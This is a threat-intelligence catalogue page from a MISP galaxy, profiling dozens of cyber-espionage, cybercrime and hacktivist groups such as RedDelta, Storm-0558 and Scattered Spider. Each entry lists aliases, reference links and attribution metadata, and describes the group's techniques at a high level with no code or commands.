Likely Chinese state-sponsored threat activity group RedDelta targeting organizations within Europe and Southeast Asia using a customized variant of the PlugX backdoor. Since at least 2019, RedDelta has been consistently active within Southeast Asia, particularly in Myanmar and Vietnam, but has also routinely adapted its targeting in response to global geopolitical events. This is historically evident through the group’s targeting of the Vatican and other Catholic organizations in the lead-up to 2021 talks between Chinese Communist Party (CCP) and Vatican officials, as well as throughout 2022 through the group’s shift towards increased targeting of European government and diplomatic entities following Russia’s invasion of Ukraine.
During the 3-month period from September through November 2022, RedDelta has regularly used an infection chain employing malicious shortcut (LNK) files, which trigger a dynamic-link library (DLL) search-order-hijacking execution chain to load consistently updated PlugX versions. Throughout this period, the group repeatedly employed decoy documents specific to government and migration policy within Europe. Of note, we identified a European government department focused on trade communicating with RedDelta command-and-control (C2) infrastructure in early August 2022. This activity commenced on the same day that a RedDelta PlugX sample using this C2 infrastructure and featuring an EU trade-themed decoy document surfaced on public malware repositories. We also identified additional probable victim entities within Myanmar and Vietnam regularly communicating with RedDelta C2 infrastructure.
RedDelta closely overlaps with public industry reporting under the aliases BRONZE PRESIDENT, Mustang Panda, TA416, Red Lich, and HoneyMyte.
Internal MISP references
UUID fceed509-938e-4f9e-acd4-76e6c28dc6f1
which can be used as unique global reference for RedDelta
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
Worok
Worok is a cyber espionage group, mostly targeting Central Asia. The group toolset includes a C++ loader named CLRLoad, a PowerShell backdoor named PowHeartBeat, and a C# loader named PNGLoad.
Internal MISP references
UUID 77742419-aa71-4bc2-94c6-29c394b350e7
which can be used as unique global reference for Worok
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['East Asia', 'Central Asia', 'Southeast Asia', 'The Middle East', 'Southern Africa'] |
cfr-target-category | ['Government', 'Energy Company'] |
cfr-type-of-incident | Espionage |
country | CN |
MoustachedBouncer
MoustachedBouncer is a cyberespionage group discovered by ESET Research and first publicly disclosed in August 2023. The group has been active since at least 2014 and only targets foreign embassies in Belarus. Since 2020, MoustachedBouncer has most likely been able to perform adversary-in-the-middle (AitM) attacks at the ISP level, within Belarus, in order to compromise its targets. The group uses two separate toolsets that we have named NightClub and Disco.
Internal MISP references
UUID 01ac8b25-492e-444b-891b-968f2694e7b2
which can be used as unique global reference for MoustachedBouncer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Belarus |
cfr-suspected-victims | ['Europe', 'Eastern Europe', 'South Asia', 'Northeast Africa'] |
cfr-target-category | ['Government'] |
cfr-type-of-incident | Espionage |
country | BY |
Storm-0324
The threat actor that Microsoft tracks as Storm-0324 is a financially motivated group known to gain initial access using email-based initial infection vectors and then hand off access to compromised networks to other threat actors. These handoffs frequently lead to ransomware deployment.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-0324.
Known Synonyms |
---|
DEV-0324 |
Sagrid |
TA543 |
Internal MISP references
UUID 8cb6f57b-9ebb-45a6-a89f-9efdb8065d70
which can be used as unique global reference for Storm-0324
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
Scattered Canary
When the first member of Scattered Canary, who, for the purposes of this report, we call Alpha, began his operations, he was a lone wolf—working mostly Craigslist scams as he learned the tricks of the trade from a mentor. However, within a few years, he had honed his craft enough to expand into romance scams, where he met his first “employee,” Beta. Once they had secured enough mules via their romance scams to launder their stolen money, they shifted from targeting individuals to targeting enterprises, and the group’s BEC operation was born.
Internal MISP references
UUID fde2d0f9-ed23-4cdc-96d3-f0a01f804707
which can be used as unique global reference for Scattered Canary
in MISP communities and other software using the MISP galaxy
External references
- https://cofense.com/blog/gift-card-fraud-ecosystem-shifts-what-paxfuls-closing-means-for-business-email-compromise/ - webarchive
- https://static.fortra.com/agari/pdfs/guide/ag-scattered-canary-gd.pdf - webarchive
- https://www.agari.com/blog/covid-19-unemployment-fraud-cares-act?_gl=1%2Ayzg6ns%2A_ga%2AMTkyMzIyOTI4MC4xNjk2MjUyMDA2%2A_ga_NHMHGJWX49%2AMTY5NjI1MjAwNS4xLjAuMTY5NjI1MjAwNS42MC4wLjA.&utm_source=press-release&utm_medium=prnewswire&utm_campaign=scattered20 - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | NG |
motive | Cybercrime |
Scattered Spider
Scattered Spider, a highly active hacking group, has made headlines by targeting more than 130 organizations, with the number of victims steadily increasing.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Scattered Spider.
Known Synonyms |
---|
0ktapus |
DEV-0971 |
Muddled Libra |
Octo Tempest |
Oktapus |
Scatter Swine |
Scattered Swine |
Starfraud |
Storm-0971 |
UNC3944 |
Internal MISP references
UUID 3b238f3a-c67a-4a9e-b474-dc3897e00129
which can be used as unique global reference for Scattered Spider
in MISP communities and other software using the MISP galaxy
External references
- https://www.cybersecurity-insiders.com/scattered-spider-managed-mgm-resort-network-outage-brings-8m-loss-daily/ - webarchive
- https://www.loginradius.com/blog/identity/oktapus-phishing-targets-okta-identity-credentials/ - webarchive
- https://www.attackiq.com/2023/11/21/attack-graph-response-to-cisa-advisory-aa23-320a/ - webarchive
- https://www.mandiant.com/resources/blog/unc3944-sms-phishing-sim-swapping-ransomware - webarchive
Associated metadata
Metadata key | Value |
---|---|
AtlasCross
NSFOCUS Security Labs recently discovered a new attack process based on phishing documents in their daily threat-hunting operations. Delving deeper into this finding through extensive research, they confirmed two new Trojan horse programs and many rare attack techniques and tactics. NSFOCUS Security Labs believes that this new attack process comes from a new APT attacker, who has a high technical level and cautious attack attitude. The phishing attack activity captured this time is part of the attacker’s targeted strike on specific targets and is its main means to achieve in-domain penetration. NSFOCUS Security Labs validated the high-level threat attributes of AtlasCross in terms of development technology and attack strategy through an in-depth analysis of its attack metrics. At this current stage, AtlasCross has a relatively limited scope of activity, primarily focusing on targeted attacks against specific hosts within a network domain. However, the attack processes they employ are highly robust and mature. NSFOCUS Security Labs deduce that this attacker is highly likely to deploy this attack process into larger-scale network attack operations.
Internal MISP references
UUID 32eebd31-5e0f-4fb9-b478-26ff4e48aaf4
which can be used as unique global reference for AtlasCross
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
Void Rabisu
Void Rabisu is an intrusion set associated with both financially motivated ransomware attacks and targeted campaigns on Ukraine and countries supporting Ukraine.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Void Rabisu.
Known Synonyms |
---|
Tropical Scorpius |
Internal MISP references
UUID 9766d52e-0e5d-4997-9c31-7f2291dcda9e
which can be used as unique global reference for Void Rabisu
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Ukraine', 'European Union'] |
Related clusters
To see the related clusters, click here.
Camaro Dragon
In early 2023, the Check Point Incident Response Team (CPIRT) team investigated a malware incident at a European healthcare institution involving a set of tools mentioned in the Avast report in late 2022. The incident was attributed to Camaro Dragon, a Chinese-based espionage threat actor whose activities overlap with activities tracked by different researchers as Mustang Panda and LuminousMoth, whose focus is primarily on Southeast Asian countries and their close peers.
Internal MISP references
UUID 9ee446fd-b0cd-4662-9cd1-a60b429192db
which can be used as unique global reference for Camaro Dragon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Storm-0558
Storm-0558 is a China-based threat actor with espionage objectives. While there are some minimal overlaps with other Chinese groups such as Violet Typhoon (ZIRCONIUM, APT31), Microsoft maintain high confidence that Storm-0558 operates as its own distinct group
Internal MISP references
UUID 5b30bcb8-4923-45cc-bc89-29651ca5d54e
which can be used as unique global reference for Storm-0558
in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/ - webarchive
- https://www.wiz.io/blog/storm-0558-compromised-microsoft-key-enables-authentication-of-countless-micr - webarchive
- https://msrc.microsoft.com/blog/2023/09/results-of-major-technical-investigations-for-storm-0558-key-acquisition/ - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
- https://blogs.microsoft.com/on-the-issues/2023/07/11/mitigation-china-based-threat-actor/ - webarchive
- https://msrc.microsoft.com/blog/2023/07/microsoft-mitigates-china-based-threat-actor-storm-0558-targeting-of-customer-email/ - webarchive
- https://www.youtube.com/watch?v=khywfhJv4H8 - webarchive
- https://www.cisa.gov/sites/default/files/2024-04/CSRB_Review_of_the_Summer_2023_MEO_Intrusion_Final_508c.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States', 'Germany'] |
cfr-target-category | ['Government'] |
cfr-type-of-incident | Espionage |
country | CN |
Scarred Manticore
Scarred Manticore has been pursuing high-value targets for years, utilizing a variety of IIS-based backdoors to attack Windows servers. These include a variety of custom web shells, custom DLL backdoors, and driver-based implants.
Internal MISP references
UUID 79d0da59-9400-40f6-b72b-6c6f47354d59
which can be used as unique global reference for Scarred Manticore
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Keksec
The threat group behind EnemyBot, Keksec, is well-resourced and has the ability to update and add new capabilities to its arsenal of malware on a daily basis (see below for more detail on Keksec)
Internal MISP references
UUID 39ef9941-4f9c-4807-ab10-88e863ce7953
which can be used as unique global reference for Keksec
in MISP communities and other software using the MISP galaxy
External references
- https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet - webarchive
- https://www.cybersecurity-insiders.com/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers-and-android-devices/?utm_source=rss&utm_medium=rss&utm_campaign=rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers-and-android-devices - webarchive
- https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/ - webarchive
- https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Xiaoqiying
Xiaoqiying is a primarily Chinese-speaking threat group that is most well known for conducting website defacement and data exfiltration attacks on more than a dozen South Korean research and academic institutions in late-January 2023. Research from Recorded Futures Insikt Group has found that the groups affiliated threat actors have signaled a new round of cyberattacks against organizations in Japan and Taiwan. Although it shows no clear ties to the Chinese government, Xiaoqiying is staunchly pro-China and vows to target NATO countries as well as any country or region that is deemed hostile to China.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Xiaoqiying.
Known Synonyms |
---|
Genesis Day |
Teng Snake |
Internal MISP references
UUID 0ee7be4f-389f-4083-a1e4-4c39dc1ae105
which can be used as unique global reference for Xiaoqiying
in MISP communities and other software using the MISP galaxy
External references
- https://www.recordedfuture.com/xiaoqiying-genesis-day-threat-actor-group-targets-south-korea-taiwan - webarchive
- https://medium.com/s2wblog/%E5%8F%98%E8%84%B8-teng-snake-a-k-a-code-core-8c35268b4d1a - webarchive
- https://therecord.media/samsung-investigating-claims-of-hack-on-south-korea-systems-internal-employee-platform/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Winter Vivern
Winter Vivern is a cyberespionage group first revealed by DomainTools in 2021. It is thought to have been active since at least 2020 and it targets governments in Europe and Central Asia. To compromise its targets, the group uses malicious documents, phishing websites, and a custom PowerShell backdoor.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Winter Vivern.
Known Synonyms |
---|
TA-473 |
TA473 |
TAG-70 |
UAC-0114 |
Internal MISP references
UUID b7497d28-02de-4722-8b97-1fc53e1d1b68
which can be used as unique global reference for Winter Vivern
in MISP communities and other software using the MISP galaxy
External references
- https://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/ - webarchive
- https://www.domaintools.com/resources/blog/winter-vivern-a-look-at-re-crafted-government-maldocs - webarchive
- https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/exploitation-dish-best-served-cold-winter-vivern-uses-known-zimbra-vulnerability - webarchive
- https://socprime.com/blog/uac-0114-group-aka-winter-vivern-attack-detection-hackers-launch-malicious-phishing-campaigns-targeting-government-entities-of-ukraine-and-poland/ - webarchive
- https://cybersecuritynews.com/russian-hackers-xss-flaw/ - webarchive
- https://www.recordedfuture.com/russia-aligned-tag-70-targets-european-government-and-military-mail - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Germany'] |
country | RU |
UNC3886
UNC3886 is an advanced cyber espionage group with unique capabilities in how they operate on-network as well as the tools they utilize in their campaigns. UNC3886 has been observed targeting firewall and virtualization technologies which lack EDR support. Their ability to manipulate firewall firmware and exploit a zero-day indicates they have curated a deeper-level of understanding of such technologies. UNC3886 has modified publicly available malware, specifically targeting *nix operating systems.
Internal MISP references
UUID 8c08dbe7-3ed0-4d7d-b315-22d8774a5bd9
which can be used as unique global reference for UNC3886
in MISP communities and other software using the MISP galaxy
External references
- https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem - webarchive
- https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence - webarchive
- https://www.mandiant.com/resources/blog/vmware-esxi-zero-day-bypass - webarchive
- https://www.mandiant.com/resources/blog/vmware-detection-containment-hardening - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Earth Longzhi
Earth Longzhi is a subgroup of APT41 targeting organizations based in Taiwan, Thailand, the Philippines, and Fiji, and using “stack rumbling” via Image File Execution Options (IFEO), a new denial-of-service (DoS) technique to disable security software.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Earth Longzhi.
Known Synonyms |
---|
SnakeCharmer |
Internal MISP references
UUID b21dbf83-3459-44f4-b91b-6157379e430a
which can be used as unique global reference for Earth Longzhi
in MISP communities and other software using the MISP galaxy
External references
- https://www.picussecurity.com/resource/blog/cyber-threat-intelligence-report-may-2023 - webarchive
- https://www.trendmicro.com/en_us/research/23/e/attack-on-security-titans-earth-longzhi-returns-with-new-tricks.html - webarchive
- https://ics-cert.kaspersky.com/publications/reports/2023/03/24/apt-attacks-on-industrial-organizations-in-h2-2022/ - webarchive
- https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
Redfly
Redfly hacked a national electricity grid organization in Asia and maintained persistent access to the network for about six months. Researchers discovered evidence for this attack between 28 February and 3 August 2023 after noticing suspicious malware activity within the organization’s network.
Internal MISP references
UUID 4f1c43a4-3788-4035-a99c-e510f89edd0f
which can be used as unique global reference for Redfly
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TetrisPhantom
TetrisPhantom relies on compromising of certain type of secure USB drives that provide hardware encryption and is commonly used by government organizations. While investigating this threat, experts identified an entire spying campaign that uses a range of malicious modules to execute commands, collect files and information from compromised computers and transfer them to other machines also using secure USB drives.
Internal MISP references
UUID 5368c0a2-eb79-420c-b808-85ae719efccd
which can be used as unique global reference for TetrisPhantom
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Earth Estries
Trend Micro found that Earth Estries relies heavily on DLL sideloading to load various tools within its arsenal. Aside from the backdoors previously mentioned, this intrusion set also utilizes commonly used remote control tools like Cobalt Strike, PlugX, or Meterpreter stagers interchangeably in various attack stages. These tools come as encrypted payloads loaded by custom loader DLLs.
Internal MISP references
UUID 1f7f4a51-c4a8-4365-ade3-83b222e7cb67
which can be used as unique global reference for Earth Estries
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GoldenJackal
GoldenJackal activity is characterized by the use of compromised WordPress websites as a method to host C2-related logic. Kaspersky believes the attackers upload a malicious PHP file that is used as a relay to forward web requests to another backbone C2 server. They developed a collection of .NET malware tools known as Jackal.
Internal MISP references
UUID 8e93e09a-734d-4b16-933f-9feb58f6ce7d
which can be used as unique global reference for GoldenJackal
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/it-threat-evolution-q2-2023/110355/ - webarchive
- https://securelist.com/goldenjackal-apt-group/109677/ - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Germany'] |
Lancefly
Lancefly targets government, aviation, and telecom organizations in South and Southeast Asia. They use a custom backdoor named Merdoor, developed since 2018, and employ various tactics to gain access, including phishing emails, SSH credential brute-forcing, and exploiting server vulnerabilities. Additionally, Lancefly has been observed using a newer version of the ZXShell rootkit and tools like PlugX and ShadowPad RAT, which are typically associated with Chinese-speaking APT groups.
Internal MISP references
UUID 2ceeab57-85e3-468b-a1b8-c035c496dcdc
which can be used as unique global reference for Lancefly
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
LofyGang
LofyGang has been found to be linked to more than 200 malicious packages, with thousands of installations throughout 2022. The group, believed to have been operating for more than a year, has multiple hacking objectives, including stealing credit card information and stealing user accounts including Discord Inc. premium accounts, streaming services accounts such as Disney+ and Minecraft accounts.
Internal MISP references
UUID a47b0f97-30fe-451d-9983-3bdc1e4608ab
which can be used as unique global reference for LofyGang
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Storm-0062
The cyberattack campaign that Microsoft uncovered was launched by a China-linked hacking group called Storm-0062. According to the company, the group is launching cyberattacks by exploiting a vulnerability in the Data Center and Server editions of Confluence. Those are versions of the application that companies run on-premises.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-0062.
Known Synonyms |
---|
DarkShadow |
Oro0lxy |
Internal MISP references
UUID d1fe4546-616a-409c-8d2c-f7a7e0a183f8
which can be used as unique global reference for Storm-0062
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
SparklingGoblin
ESET researchers have discovered a new undocumented modular backdoor, SideWalk, being used by an APT group they’ve named SparklingGoblin; this backdoor was used during one of SparklingGoblin’s recent campaigns that targeted a computer retail company based in the USA. This backdoor shares multiple similarities with another backdoor used by the group: CROSSWALK.
Internal MISP references
UUID f3fd4397-19e4-47e0-b1bc-f792690e3bd0
which can be used as unique global reference for SparklingGoblin
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Kasablanka
The Kasablanka group is a cyber-criminal organization that has specifically targeted Russia between September and December 2022, using various payloads delivered through phishing emails containing socially engineered lnk files, zip packages, and executables attached to virtual disk image files.
Internal MISP references
UUID 6db3ad41-6b47-43c8-b94b-98853749ee02
which can be used as unique global reference for Kasablanka
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | MA |
YoroTrooper
YoroTrooper’s main targets are government or energy organizations in Azerbaijan, Tajikistan, Kyrgyzstan and other Commonwealth of Independent States, based on Cisco Talos analysis. YoroTrooper was also observed compromising accounts from at least two international organizations: a critical European Union health care agency and the World Intellectual Property Organization. Successful compromises also included Embassies of European countries including Azerbaijan and Turkmenistan.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular YoroTrooper.
Known Synonyms |
---|
Salted Earth |
Sturgeon Fisher |
Internal MISP references
UUID 2031ae01-e962-4861-a224-0934af6cdd3a
which can be used as unique global reference for YoroTrooper
in MISP communities and other software using the MISP galaxy
External references
- https://blog.talosintelligence.com/attributing-yorotrooper/ - webarchive
- https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/ - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Germany'] |
country | KZ |
Metador
Metador primarily targets telecommunications, internet service providers, and universities in several countries in the Middle East and Africa. Metador’s attack chains are designed to bypass native security solutions while deploying malware platforms directly into memory. SentinelLabs researchers discovered variants of two long-standing Windows malware platforms, and indications of an additional Linux implant.
Internal MISP references
UUID 5d22315b-55ef-4d8a-86aa-00ba38057641
which can be used as unique global reference for Metador
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
SiegedSec
SiegedSec, a hacktivist collective, emerged coincidentally just days before Russia’s invasion of Ukraine. Under the leadership of the hacktivist known as “YourAnonWolf,” the group swiftly gained strength, announcing an increasing number of victims after its inception. The group humorously self-identifies as “gay furry hackers” and is renowned for its comical slogans and the use of vulgar language. SiegedSec has affiliations with other hacker groups like GhostSec and typically consists of members aged between 18 and 26.
Internal MISP references
UUID 3c2f534a-a898-4af6-b3e8-f2740c473de0
which can be used as unique global reference for SiegedSec
in MISP communities and other software using the MISP galaxy
External references
- https://therecord.media/nato-siegedsec-unclassified-websites-alleged-cyberattack - webarchive
- https://socradar.io/threat-actor-profile-siegedsec/ - webarchive
- https://socradar.io/the-five-families-hacker-collaboration-redefining-the-game/ - webarchive
- https://therecord.media/fort-worth-officials-say-leaked-data-was-public - webarchive
- https://webz.io/dwp/exclusive-hacktivists-attack-anti-abortion-u-s-states/ - webarchive
- https://www.darkowl.com/blog-content/darkowl-threat-actor-spotlight-siegedsec-and-leaked-data/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
RansomVC
Ransomed.VC burst onto the scene with a well-orchestrated PR campaign, encompassing a clearnet site and multiple communication channels including Telegram and Twitter/X profiles. Their operations are heavily inclined towards exploiting GDPR penalties as a method of extortion, threatening victims with potential legal repercussions in case of data leaks.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RansomVC.
Known Synonyms |
---|
Ransomed.vc |
Internal MISP references
UUID f939b51d-32f9-41d9-8549-f00b2db104c7
which can be used as unique global reference for RansomVC
in MISP communities and other software using the MISP galaxy
External references
- https://therecord.media/colonial-pipeline-attributes-ransomware-claims-to-unrelated-third-party-breach - webarchive
- https://socradar.io/on-the-horizon-ransomed-vc-ransomware-group-spotted-in-the-wild/ - webarchive
- https://www.sentinelone.com/blog/sep-2023-cybercrime-update-new-ransomware-threats-and-the-rising-menace-of-telegram/ - webarchive
- https://socradar.io/unmasking-usdod-the-enigma-of-the-cyber-realm/ - webarchive
- https://www.videogameschronicle.com/news/a-ransomware-group-claims-to-have-beached-all-sony-systems/ - webarchive
- https://securityaffairs.com/151550/data-breach/ransomed-vc-sony-ntt-alleged-attacks.html - webarchive
- https://blog.talosintelligence.com/threat-source-newsletter-sept-28-2023/ - webarchive
- https://www.resecurity.com/blog/article/ransomedvc-in-the-spotlight-what-we-know-about-the-ransomware-group-targeting-major-japanese-businesses - webarchive
Associated metadata
Metadata key | Value |
---|---|
Carderbee
Symantec recently reported on activity attributed to a threat actor group dubbed Carderbee. In the campaign, the threat actors target entities in Hong Kong and other regions of Asia via a supply chain attack leveraging the legitimate Cobra DocGuard software. The activity began as early as September 2022.
Internal MISP references
UUID ce793b99-0cf2-4148-831c-ea5f6a9e0a76
which can be used as unique global reference for Carderbee
in MISP communities and other software using the MISP galaxy
External references
- https://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia - webarchive
- https://blog.polyswarm.io/carderbee-targets-hong-kong-in-supply-chain-attack - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/carderbee-software-supply-chain-certificate-abuse - webarchive
Associated metadata
Metadata key | Value |
---|---|
UNC3890
A suspected Iranian threat activity cluster has been linked to attacks aimed at Israeli shipping, government, energy, and healthcare organizations, in a campaign stretching back to late 2020. Researchers believe that the data harvested during the campaign could be used to support various activities. UNC3890, the threat actor behind the attacks, deployed two proprietary pieces of malware – a backdoor named “SUGARUSH” and a browser credential stealer called “SUGARDUMP”, which exfiltrates password information to email addresses registered with Gmail, ProtonMail, Yahoo and Yandex email services. The threat actor also employs a network of C&C servers that host fake login pages impersonating legitimate platforms such as Office 365, LinkedIn and Facebook. These servers are designed to communicate with the targets and also with a watering hole hosted on the login page of a legitimate Israeli shipping company.
Internal MISP references
UUID 27e11cc5-1688-4aea-a98d-96e6c275d005
which can be used as unique global reference for UNC3890
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
RedStinger
In October 2022, Kaspersky identified an active infection of government, agriculture and transportation organizations located in the Donetsk, Lugansk, and Crimea regions. Although the initial vector of compromise is unclear, the details of the next stage imply the use of spear phishing or similar methods. The victims navigated to a URL pointing to a ZIP archive hosted on a malicious web server.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RedStinger.
Known Synonyms |
---|
Bad Magic |
Internal MISP references
UUID b813c6a2-f8c7-4071-83bd-24c181ff2bd4
which can be used as unique global reference for RedStinger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Witchetty
Witchetty was first documented by ESET in April 2022, who concluded that it was one of three sub-groups of TA410, a broad cyber-espionage operation with some links to the Cicada group (aka APT10). Witchetty’s activity was characterized by the use of two pieces of malware, a first-stage backdoor known as X4 and a second-stage payload known as LookBack. ESET reported that the group had targeted governments, diplomatic missions, charities, and industrial/manufacturing organizations.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Witchetty.
Known Synonyms |
---|
LookingFrog |
Internal MISP references
UUID 202f5481-7bae-4a0b-b117-0642ea1dbe65
which can be used as unique global reference for Witchetty
in MISP communities and other software using the MISP galaxy
External references
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-witchetty-apt-group-active-iocs - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage - webarchive
- https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
NB65
Network Battalion 65 is an hactivist group with ties to Anonymous, known for attacking Russian companies and performing hack-and-leak operations.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NB65.
Known Synonyms |
---|
Network Battalion 65 |
Internal MISP references
UUID e1941666-dcde-4f31-8a56-8041ac82bb99
which can be used as unique global reference for NB65
in MISP communities and other software using the MISP galaxy
External references
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-leaked-conti-ransomware-used-to-target-russia-active-iocs - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html - webarchive
- https://securelist.com/reassessing-cyberwarfare-lessons-learned-in-2022/108328/ - webarchive
- https://www.rewterz.com/articles/russian-ukrainian-cyber-warfare-rewterz-threat-intelligence-rollup - webarchive
- https://www.hackread.com/anonymous-affiliate-nb65-russia-broadcaster-data-breach/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
IndigoZebra
IndigoZebra is a Chinese state-sponsored actor mentioned for the first time by Kaspersky in its APT Trends report Q2 2017, targeting, at the time of its discovery, former Soviet Republics with multiple malware strains including Meterpreter, Poison Ivy, xDown, and a previously unknown backdoor called “xCaon.”
Internal MISP references
UUID 79e826b0-b051-4a61-b38c-496021b3afdb
which can be used as unique global reference for IndigoZebra
in MISP communities and other software using the MISP galaxy
External references
- https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/ - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-intel-indigozebra-apt-group-targeting-central-asia-active-iocs - webarchive
- https://securelist.com/apt-trends-report-q2-2017/79332/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
GhostSec
GhostSec is a hacktivist group that emerged as an offshoot of Anonymous. They primarily focused on counterterrorism efforts and monitoring online activities associated with terrorism. They gained prominence following the 2015 Charlie Hebdo shooting in Paris and the rise of ISIS.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GhostSec.
Known Synonyms |
---|
Ghost Security |
Internal MISP references
UUID a1315451-326f-4185-8d71-80f9243f395f
which can be used as unique global reference for GhostSec
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
OilAlpha
OilAlpha has almost exclusively relied on infrastructure associated with the Public Telecommunication Corporation (PTC), a Yemeni government-owned enterprise reported to be under the direct control of the Houthi authorities. OilAlpha used encrypted chat messengers like WhatsApp to launch social engineering attacks against its targets. It has also used URL link shorteners. Per victimology assessment, it appears a majority of the targeted entities were Arabic-language speakers and operated Android devices.
Internal MISP references
UUID ae2b897d-f285-4d03-9bab-0ff59d6657a7
which can be used as unique global reference for OilAlpha
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
HiddenArt
